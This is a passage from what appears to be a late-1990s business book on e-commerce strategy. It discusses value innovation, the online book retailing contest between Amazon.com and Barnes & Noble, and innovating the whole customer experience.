In subtle ways, e-commerce is fundamentally changing the customer value proposition. In recent years, value innovation across all service dimensions (speed, convenience, personalization, and price) has accelerated due to technological innovations such as the Web and e-commerce. These innovations have substantially changed the underlying value proposition, which in turn has changed the capabilities and competencies needed by companies.

What do we mean by value innovation? Faced with similar products, too many options, and lack of time, the customer's natural reaction is to simplify by looking for the cheapest, the most familiar, or the best-quality product. Obviously, companies want to locate themselves in one of these niches. A product or service that is 98 percent as good, isn't familiar, or costs 50 cents more is lost in a no man's land. Companies that follow middle-of-the-road strategies will underperform. This leads to the fifth rule of e-business: e-Commerce is enabling companies to listen to their customers and become either "the cheapest," "the most familiar," or "the best."

"The cheapest" isn't synonymous with inferior. It means a value-oriented format that has taken out many of the inventory and distribution costs, such as Southwest's "No Frills Flying" and Wal-Mart's "Every Day Low Prices." The best example of the value-oriented format is Wal-Mart, which helped define a revolution in American retailing with its discount superstore format. That format, combined with friendly customer service, superb inventory management, and an entrepreneurial corporate atmosphere, helped the company steamroll competition. Recently, Wal-Mart has taken "the cheapest" model and applied it to the grocery business. The company is experimenting with 40,000-square-foot Wal-Mart Neighborhood Markets that will compete head on with grocers.

With "the most familiar," customers know what they're getting. McDonald's is a great example of a familiar brand. Often visitors to foreign countries seek out local McDonald's restaurants just because they know what to expect. It took the brand giants of the past, such as McDonald's and Coca-Cola, decades to make their products household names. By contrast, it's taken so-called Internet megabrands, such as America Online and Yahoo!, only a few years to carve out strong identities.

Being "the best" involves reinventing service processes, being able to turn the company on a dime, and raising relationships with customers and suppliers to unprecedented levels of intimacy. The most obvious example of the best in exceptional service is American Express, exemplified in its Return Protection Plan. This customer benefit refunds cardmembers for items purchased with an Amex card within 90 days from the date of purchase, if the store won't accept returns. Amex will refund the cardmember's account for the purchase price, up to $300 per item, up to $1,000 per year.
By continuously generating innovative improvements to customer service and benefits, Amex retains high customer loyalty. Wherever firms are in the value continuum, customers want continuous innovation. Microsoft CEO Bill Gates calls it the "What have you done for me lately?" syndrome. Faced with the burden of increasing time pressure and decreasing service levels, customers are no longer content with the status quo. They want companies to innovate and push service to a new frontier to make their lives easier in some way. Clearly, companies are caught in the midst of a tornado of spiraling business transformation. A good example is the book retailing industry.

Learning from Value Innovation in the Book Retailing Industry

The story of the Internet book retailing war between market leader Barnes & Noble (B&N) and upstart Amazon.com is one of the most written about in recent years. At stake is a significant share of the worldwide book market, estimated to be more than $75 billion (international sales constitute some 30 percent of several players' online business). Given the high stakes, Amazon.com forced the entrenched leader, B&N, and to a lesser extent Borders, to respond to its challenge.

Conventional logic dictates that B&N would dominate Amazon.com on the Internet due to its high name recognition, already advanced fulfillment process (it can leverage its catalog experience), and low prices (in contrast to smaller players, B&N purchases a large number of titles directly from publishers). One would also assume that online customers fit the same profile as those who shop in stores, that their needs are the same. True? No! The needs and demographics of the online customer are different. In preliminary research, B&N indicated that online book shoppers buy five to ten times as many books as traditional book buyers. Online book customers have an interesting profile: They live in remote or international locations; they're interested in incremental price savings (an estimated "all-in" savings of around 15 percent); they are pressed for time; and they don't mind waiting one to three days for delivery. Clearly, value is influenced by the demographics of online shoppers.

At this stage, it is too early to declare the winner in the online book wars. It's fair to say, however, that market leaders will need to provide value by finding the most interesting and simple way to use the Web, providing the best service (via speed and control), and giving customers the lowest price, because it's so easy to point and click to the competition.

What does this example mean for executives? Amazon.com has identified and innovated one component of value to a level of excellence that puts its competitors to shame. Jeff Bezos, CEO of Amazon.com, isn't unique. He's following in the footsteps of other business entrepreneurs who took advantage of technology to build giant businesses from scratch: Sam Walton, Craig McCaw, Bill Gates, and Charles Schwab, to name only a few.

The role of an executive is to help the company understand the threat posed by value migration. Some industries will be profoundly affected, while others will feel little impact. It's vital that executives monitor the impact of readily available digital information on their industries. To do that, executives should answer these questions:

· Is there an Amazon.com that can squeeze margins in your business? If not, can you create one?

· Are there any new entrants in your industry that are leveraging the Web to rewrite the rules?
Watch out for a new generation of infomediaries attempting to harness the efficiencies of the Web. Bottom line: Don't take your industry's conditions as a given. You must understand that technology can create conditions in which companies that once were king of the mountain can wake up one day to find no mountain at all.

Define Value in Terms of the Whole Customer Experience

Identifying new sources of customer value is an important step, but it is not enough. Firms need to innovate the complete customer experience. The ability to streamline the end-to-end experience provides a complete solution and sets visionary companies apart. Amazon.com, for instance, makes the mundane process of comparing, buying, and receiving books an interesting experience that customers find convenient and easy to use. This discussion leads us to the sixth rule of e-business: Don't use technology just to create the product. Use technology to innovate, entertain, and enhance the entire experience surrounding the product, from selection and ordering to receiving and service.

Amazon.com has undertaken revolutionary initiatives in customer experience through its user interface. We are aware of few other companies that have bundled experience innovation with traditional elements of brand building as successfully. Amazon.com's layout and linkages are logical, intuitive, and, just as important, entertaining. To create a satisfying shopping experience, the company created an e-retail infrastructure that meets the unspoken needs of customers. For example, hard-to-find, relatively unpopular, out-of-print titles can be traced through Amazon.com's special orders department. When a customer inquires about an out-of-print book, the special orders department contacts suppliers to check availability and, if a copy is located, notifies the customer by e-mail for approval of the price and condition prior to shipping the book. This level of service for a national and international audience is unprecedented in the book retailing business.

Amazon.com also provides third-party content, a valuable part of the book purchase process. It includes author interviews and prerelease information, which build a sense of urgency and also help to cement the relationship with heavy users (bibliophiles, in particular); instant order confirmation; customized search engines; editorial analysis; and carefully managed delivery expectations (which set up the user for a positive surprise). These elements combine to create the richness of the Amazon.com experience and have garnered the company a very high customer loyalty rate of more than 58 percent.

As business environments become electronic, firms need to think like Amazon.com in terms of resetting consumers' expectations and experiences. Established firms often discount the importance of the experience offered by a product or service as a key differentiator. Traditional customer experiences have temporal and geographic bounds: Customers must go to a specific store at a specific location between certain hours. But the online experience is quite different, and it needs to be familiar, informative, and easy to use. Any company that can wrap experience attributes around a commodity product or service has the chance to be an industry revolutionary. However, implementing an effective experience means more than having an attractive, interactive front end.
In the first phase of e-commerce, too many firms got carried away by the interactive front ends that are so easy to generate on the Web, ignoring the fact that there must be an integrated business back end that drives the enterprise to success. Providing satisfying front-end and back-end experiences is a critical skill that separates the men from the boys in e-business.